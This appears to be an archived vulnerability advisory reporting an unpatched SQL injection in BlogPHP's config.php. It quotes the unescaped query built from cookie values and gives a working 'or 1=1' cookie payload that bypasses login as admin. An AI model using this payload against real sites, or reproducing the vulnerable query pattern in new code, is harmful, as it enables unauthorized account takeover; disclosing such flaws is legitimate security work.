<<< Date Index >>>     <<< Thread Index >>>

BlogPHP config.php SQL injection login bypass



SELECT level,email,url FROM ".$pre."users WHERE username = 
'".$_COOKIE[blogphp_username]."' AND password = 
'".$_COOKIE[blogphp_password]."'"

--------------------Summary----------------

Software: BlogPHP
Sowtware's Web Site: http://www.blogphp.net/
Versions: 1(2)
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei
-----------------Description---------------
Vulnerable scripts (as include):
config.php

Variable $_COOKIE[blogphp_username]and $_COOKIE[blogphp_password] never 
addslashed and have potential for SQL inject

--------------Exploit----------------------
send a cookie: 
blogphp_username=admin
blogphp_password=imei' or '1'='1
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: imei
contact : addmimistrator@xxxxxxxxx